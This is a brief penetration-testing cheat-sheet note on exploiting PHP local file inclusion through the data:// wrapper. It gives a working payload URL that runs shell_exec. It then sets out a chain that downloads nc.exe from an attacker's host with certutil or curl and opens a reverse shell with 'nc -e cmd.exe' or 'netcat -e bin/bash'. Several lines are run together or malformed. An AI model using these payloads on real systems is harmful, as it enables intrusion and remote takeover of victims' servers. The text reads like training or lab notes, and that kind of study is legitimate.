It can be used to exploit Directory Traversal and LFI. This gives us additional flexibility when attempting to inject PHP code via LFI vulnerabilities. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code.
# We know this is vulnerable to LFI so we use a data wrapper# Hence, LFI without manipulating the local file. # ADDING SHELL EXEC IN END TO SEEhttp://<IP>/menu.php?file=data:text/plain,<?php echoshell_exec("whoami")?>
Once we see the result from shell_exec, it means we got the web shell. The next step is always to transfer nc.exe (windows) or netcat binary and then get the shell back on our terminal using the following approach
1.HostaPythonwebserveronourattackingKalimachine2. http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("certutil.exe -urlcache -f http://<Attacking IP>/nc.exe nc.exe")?>
3.Oncethenc.exeistransferredissuethefollowingcommandtogetthelocalshellnc.exe-ecmd.exe<Kali's IP> <port>4. If the victim is a Kali machine, transfer the Netcat binaryhttp://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("curl -o http://<Attacking IP>/nc.exe")?>5. netcat -e bin/bash <Kali'sIP><port># Try all transfer methods if one doesn't work